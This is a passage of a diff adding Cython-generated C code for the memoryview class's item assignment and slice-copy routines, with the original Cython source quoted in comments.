__Pyx_XDECREF(__pyx_v_indices); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":420 + * return self.convert_item_to_object(itemp) + * + * def __setitem__(memoryview self, object index, object value): # <<<<<<<<<<<<<< + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" + */ + +/* Python wrapper */ +static int __pyx_memoryview___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_memoryview___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setitem__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((PyObject *)__pyx_v_index), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + PyObject *__pyx_v_have_slices = NULL; + PyObject *__pyx_v_obj = NULL; + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setitem__", 0); + __Pyx_INCREF(__pyx_v_index); + + /* "View.MemoryView":421 + * + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: # <<<<<<<<<<<<<< + * raise TypeError, "Cannot assign to read-only memoryview" + * + */ + if (unlikely(__pyx_v_self->view.readonly)) { + + /* "View.MemoryView":422 + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" # <<<<<<<<<<<<<< + * + * have_slices, index = _unellipsify(index, self.view.ndim) + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_Cannot_assign_to_read_only_memor, 0, 0); + __PYX_ERR(1, 422, __pyx_L1_error) + + /* "View.MemoryView":421 + * + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: # <<<<<<<<<<<<<< + * raise TypeError, "Cannot assign to read-only memoryview" + * + */ + } + + /* "View.MemoryView":424 + * raise TypeError, "Cannot assign to read-only memoryview" + * + * have_slices, index = _unellipsify(index, self.view.ndim) # <<<<<<<<<<<<<< + * + * if have_slices: + */ + __pyx_t_1 = _unellipsify(__pyx_v_index, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (likely(__pyx_t_1 != Py_None)) { + PyObject* sequence = __pyx_t_1; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(1, 424, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); + __Pyx_INCREF(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + #else + __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + #endif + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } else { + __Pyx_RaiseNoneNotIterableError(); __PYX_ERR(1, 424, __pyx_L1_error) + } + __pyx_v_have_slices = __pyx_t_2; + __pyx_t_2 = 0; + __Pyx_DECREF_SET(__pyx_v_index, __pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":426 + * have_slices, index = _unellipsify(index, self.view.ndim) + * + * if have_slices: # <<<<<<<<<<<<<< + * obj = self.is_slice(value) + * if obj: + */ + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_v_have_slices); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(1, 426, __pyx_L1_error) + if (__pyx_t_4) { + + /* "View.MemoryView":427 + * + * if have_slices: + * obj = self.is_slice(value) # <<<<<<<<<<<<<< + * if obj: + * self.setitem_slice_assignment(self[index], obj) + */ + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->is_slice(__pyx_v_self, __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 427, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_obj = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":428 + * if have_slices: + * obj = self.is_slice(value) + * if obj: # <<<<<<<<<<<<<< + * self.setitem_slice_assignment(self[index], obj) + * else: + */ + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_v_obj); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(1, 428, __pyx_L1_error) + if (__pyx_t_4) { + + /* "View.MemoryView":429 + * obj = self.is_slice(value) + * if obj: + * self.setitem_slice_assignment(self[index], obj) # <<<<<<<<<<<<<< + * else: + * self.setitem_slice_assign_scalar(self[index], value) + */ + __pyx_t_1 = __Pyx_PyObject_GetItem(((PyObject *)__pyx_v_self), __pyx_v_index); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 429, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_slice_assignment(__pyx_v_self, __pyx_t_1, __pyx_v_obj); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 429, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "View.MemoryView":428 + * if have_slices: + * obj = self.is_slice(value) + * if obj: # <<<<<<<<<<<<<< + * self.setitem_slice_assignment(self[index], obj) + * else: + */ + goto __pyx_L5; + } + + /* "View.MemoryView":431 + * self.setitem_slice_assignment(self[index], obj) + * else: + * self.setitem_slice_assign_scalar(self[index], value) # <<<<<<<<<<<<<< + * else: + * self.setitem_indexed(index, value) + */ + /*else*/ { + __pyx_t_3 = __Pyx_PyObject_GetItem(((PyObject *)__pyx_v_self), __pyx_v_index); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 431, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (!(likely(((__pyx_t_3) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_3, __pyx_memoryview_type))))) __PYX_ERR(1, 431, __pyx_L1_error) + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_slice_assign_scalar(__pyx_v_self, ((struct __pyx_memoryview_obj *)__pyx_t_3), __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 431, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_L5:; + + /* "View.MemoryView":426 + * have_slices, index = _unellipsify(index, self.view.ndim) + * + * if have_slices: # <<<<<<<<<<<<<< + * obj = self.is_slice(value) + * if obj: + */ + goto __pyx_L4; + } + + /* "View.MemoryView":433 + * self.setitem_slice_assign_scalar(self[index], value) + * else: + * self.setitem_indexed(index, value) # <<<<<<<<<<<<<< + * + * cdef is_slice(self, obj): + */ + /*else*/ { + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_indexed(__pyx_v_self, __pyx_v_index, __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 433, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_L4:; + + /* "View.MemoryView":420 + * return self.convert_item_to_object(itemp) + * + * def __setitem__(memoryview self, object index, object value): # <<<<<<<<<<<<<< + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.__setitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_have_slices); + __Pyx_XDECREF(__pyx_v_obj); + __Pyx_XDECREF(__pyx_v_index); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":435 + * self.setitem_indexed(index, value) + * + * cdef is_slice(self, obj): # <<<<<<<<<<<<<< + * if not isinstance(obj, memoryview): + * try: + */ + +static PyObject *__pyx_memoryview_is_slice(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_slice", 0); + __Pyx_INCREF(__pyx_v_obj); + + /* "View.MemoryView":436 + * + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): # <<<<<<<<<<<<<< + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + */ + __pyx_t_1 = __Pyx_TypeCheck(__pyx_v_obj, __pyx_memoryview_type); + __pyx_t_2 = (!__pyx_t_1); + if (__pyx_t_2) { + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_3, &__pyx_t_4, &__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_4); + __Pyx_XGOTREF(__pyx_t_5); + /*try:*/ { + + /* "View.MemoryView":438 + * if not isinstance(obj, memoryview): + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, # <<<<<<<<<<<<<< + * self.dtype_is_object) + * except TypeError: + */ + __pyx_t_6 = __Pyx_PyInt_From_int(((__pyx_v_self->flags & (~PyBUF_WRITABLE)) | PyBUF_ANY_CONTIGUOUS)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_6); + + /* "View.MemoryView":439 + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) # <<<<<<<<<<<<<< + * except TypeError: + * return None + */ + __pyx_t_7 = __Pyx_PyBool_FromLong(__pyx_v_self->dtype_is_object); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 439, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_7); + + /* "View.MemoryView":438 + * if not isinstance(obj, memoryview): + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, # <<<<<<<<<<<<<< + * self.dtype_is_object) + * except TypeError: + */ + __pyx_t_8 = PyTuple_New(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_INCREF(__pyx_v_obj); + __Pyx_GIVEREF(__pyx_v_obj); + PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_v_obj); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_8, 1, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_8, 2, __pyx_t_7); + __pyx_t_6 = 0; + __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_8, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF_SET(__pyx_v_obj, __pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + goto __pyx_L9_try_end; + __pyx_L4_error:; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + + /* "View.MemoryView":440 + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + * except TypeError: # <<<<<<<<<<<<<< + * return None + * + */ + __pyx_t_9 = __Pyx_PyErr_ExceptionMatches(__pyx_builtin_TypeError); + if (__pyx_t_9) { + __Pyx_AddTraceback("View.MemoryView.memoryview.is_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_7, &__pyx_t_8, &__pyx_t_6) < 0) __PYX_ERR(1, 440, __pyx_L6_except_error) + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_6); + + /* "View.MemoryView":441 + * self.dtype_is_object) + * except TypeError: + * return None # <<<<<<<<<<<<<< + * + * return obj + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L7_except_return; + } + goto __pyx_L6_except_error; + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + __pyx_L6_except_error:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_XGIVEREF(__pyx_t_5); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_4, __pyx_t_5); + goto __pyx_L1_error; + __pyx_L7_except_return:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_XGIVEREF(__pyx_t_5); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_4, __pyx_t_5); + goto __pyx_L0; + __pyx_L9_try_end:; + } + + /* "View.MemoryView":436 + * + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): # <<<<<<<<<<<<<< + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + */ + } + + /* "View.MemoryView":443 + * return None + * + * return obj # <<<<<<<<<<<<<< + * + * cdef setitem_slice_assignment(self, dst, src): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_obj); + __pyx_r = __pyx_v_obj; + goto __pyx_L0; + + /* "View.MemoryView":435 + * self.setitem_indexed(index, value) + * + * cdef is_slice(self, obj): # <<<<<<<<<<<<<< + * if not isinstance(obj, memoryview): + * try: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_obj); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":445 + * return obj + * + * cdef setitem_slice_assignment(self, dst, src): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + */ + +static PyObject *__pyx_memoryview_setitem_slice_assignment(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_dst, PyObject *__pyx_v_src) { + __Pyx_memviewslice __pyx_v_dst_slice; + __Pyx_memviewslice __pyx_v_src_slice; + __Pyx_memviewslice __pyx_v_msrc; + __Pyx_memviewslice __pyx_v_mdst; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_t_3; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_slice_assignment", 0); + + /* "View.MemoryView":448 + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + * cdef __Pyx_memviewslice msrc = get_slice_from_memview(src, &src_slice)[0] # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] + * + */ + if (!(likely(((__pyx_v_src) == Py_None) || likely(__Pyx_TypeTest(__pyx_v_src, __pyx_memoryview_type))))) __PYX_ERR(1, 448, __pyx_L1_error) + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(((struct __pyx_memoryview_obj *)__pyx_v_src), (&__pyx_v_src_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 448, __pyx_L1_error) + __pyx_v_msrc = (__pyx_t_1[0]); + + /* "View.MemoryView":449 + * cdef __Pyx_memviewslice src_slice + * cdef __Pyx_memviewslice msrc = get_slice_from_memview(src, &src_slice)[0] + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] # <<<<<<<<<<<<<< + * + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + */ + if (!(likely(((__pyx_v_dst) == Py_None) || likely(__Pyx_TypeTest(__pyx_v_dst, __pyx_memoryview_type))))) __PYX_ERR(1, 449, __pyx_L1_error) + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(((struct __pyx_memoryview_obj *)__pyx_v_dst), (&__pyx_v_dst_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 449, __pyx_L1_error) + __pyx_v_mdst = (__pyx_t_1[0]); + + /* "View.MemoryView":451 + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] + * + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) # <<<<<<<<<<<<<< + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_src, __pyx_n_s_ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyInt_As_int(__pyx_t_2); if (unlikely((__pyx_t_3 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_dst, __pyx_n_s_ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyInt_As_int(__pyx_t_2); if (unlikely((__pyx_t_4 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_5 = __pyx_memoryview_copy_contents(__pyx_v_msrc, __pyx_v_mdst, __pyx_t_3, __pyx_t_4, __pyx_v_self->dtype_is_object); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 451, __pyx_L1_error) + + /* "View.MemoryView":445 + * return obj + * + * cdef setitem_slice_assignment(self, dst, src): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_slice_assignment", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":453 + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): # <<<<<<<<<<<<<< + * cdef int array[128] + * cdef void *tmp = NULL + */ + +static PyObject *__pyx_memoryview_setitem_slice_assign_scalar(struct __pyx_memoryview_obj *__pyx_v_self, struct __pyx_memoryview_obj *__pyx_v_dst, PyObject *__pyx_v_value) { + int __pyx_v_array[0x80]; + void *__pyx_v_tmp; + void *__pyx_v_item; + __Pyx_memviewslice *__pyx_v_dst_slice; + __Pyx_memviewslice __pyx_v_tmp_slice; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_t_5; + char const *__pyx_t_6; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + PyObject *__pyx_t_9 = NULL; + PyObject *__pyx_t_10 = NULL; + PyObject *__pyx_t_11 = NULL; + PyObject *__pyx_t_12 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_slice_assign_scalar", 0); + + /* "View.MemoryView":455 + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): + * cdef int array[128] + * cdef void *tmp = NULL # <<<<<<<<<<<<<< + * cdef void *item + * + */ + __pyx_v_tmp = NULL; + + /* "View.MemoryView":460 + * cdef __Pyx_memviewslice *dst_slice + * cdef __Pyx_memviewslice tmp_slice + * dst_slice = get_slice_from_memview(dst, &tmp_slice) # <<<<<<<<<<<<<< + * + * if self.view.itemsize > sizeof(array): + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_dst, (&__pyx_v_tmp_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 460, __pyx_L1_error) + __pyx_v_dst_slice = __pyx_t_1; + + /* "View.MemoryView":462 + * dst_slice = get_slice_from_memview(dst, &tmp_slice) + * + * if self.view.itemsize > sizeof(array): # <<<<<<<<<<<<<< + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + */ + __pyx_t_2 = (((size_t)__pyx_v_self->view.itemsize) > (sizeof(__pyx_v_array))); + if (__pyx_t_2) { + + /* "View.MemoryView":463 + * + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) # <<<<<<<<<<<<<< + * if tmp == NULL: + * raise MemoryError + */ + __pyx_v_tmp = PyMem_Malloc(__pyx_v_self->view.itemsize); + + /* "View.MemoryView":464 + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * item = tmp + */ + __pyx_t_2 = (__pyx_v_tmp == NULL); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":465 + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + * raise MemoryError # <<<<<<<<<<<<<< + * item = tmp + * else: + */ + PyErr_NoMemory(); __PYX_ERR(1, 465, __pyx_L1_error) + + /* "View.MemoryView":464 + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * item = tmp + */ + } + + /* "View.MemoryView":466 + * if tmp == NULL: + * raise MemoryError + * item = tmp # <<<<<<<<<<<<<< + * else: + * item = array + */ + __pyx_v_item = __pyx_v_tmp; + + /* "View.MemoryView":462 + * dst_slice = get_slice_from_memview(dst, &tmp_slice) + * + * if self.view.itemsize > sizeof(array): # <<<<<<<<<<<<<< + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":468 + * item = tmp + * else: + * item = array # <<<<<<<<<<<<<< + * + * try: + */ + /*else*/ { + __pyx_v_item = ((void *)__pyx_v_array); + } + __pyx_L3:; + + /* "View.MemoryView":470 + * item = array + * + * try: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * ( item)[0] = value + */ + /*try:*/ { + + /* "View.MemoryView":471 + * + * try: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * ( item)[0] = value + * else: + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":472 + * try: + * if self.dtype_is_object: + * ( item)[0] = value # <<<<<<<<<<<<<< + * else: + * self.assign_item_from_object( item, value) + */ + (((PyObject **)__pyx_v_item)[0]) = ((PyObject *)__pyx_v_value); + + /* "View.MemoryView":471 + * + * try: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * ( item)[0] = value + * else: + */ + goto __pyx_L8; + } + + /* "View.MemoryView":474 + * ( item)[0] = value + * else: + * self.assign_item_from_object( item, value) # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __pyx_t_3 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->assign_item_from_object(__pyx_v_self, ((char *)__pyx_v_item), __pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 474, __pyx_L6_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_L8:; + + /* "View.MemoryView":478 + * + * + * if self.view.suboffsets != NULL: # <<<<<<<<<<<<<< + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + */ + __pyx_t_2 = (__pyx_v_self->view.suboffsets != NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":479 + * + * if self.view.suboffsets != NULL: + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) # <<<<<<<<<<<<<< + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + * item, self.dtype_is_object) + */ + __pyx_t_4 = assert_direct_dimensions(__pyx_v_self->view.suboffsets, __pyx_v_self->view.ndim); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(1, 479, __pyx_L6_error) + + /* "View.MemoryView":478 + * + * + * if self.view.suboffsets != NULL: # <<<<<<<<<<<<<< + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + */ + } + + /* "View.MemoryView":480 + * if self.view.suboffsets != NULL: + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, # <<<<<<<<<<<<<< + * item, self.dtype_is_object) + * finally: + */ + __pyx_memoryview_slice_assign_scalar(__pyx_v_dst_slice, __pyx_v_dst->view.ndim, __pyx_v_self->view.itemsize, __pyx_v_item, __pyx_v_self->dtype_is_object); + } + + /* "View.MemoryView":483 + * item, self.dtype_is_object) + * finally: + * PyMem_Free(tmp) # <<<<<<<<<<<<<< + * + * cdef setitem_indexed(self, index, value): + */ + /*finally:*/ { + /*normal exit:*/{ + PyMem_Free(__pyx_v_tmp); + goto __pyx_L7; + } + __pyx_L6_error:; + /*exception exit:*/{ + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __pyx_t_7 = 0; __pyx_t_8 = 0; __pyx_t_9 = 0; __pyx_t_10 = 0; __pyx_t_11 = 0; __pyx_t_12 = 0; + 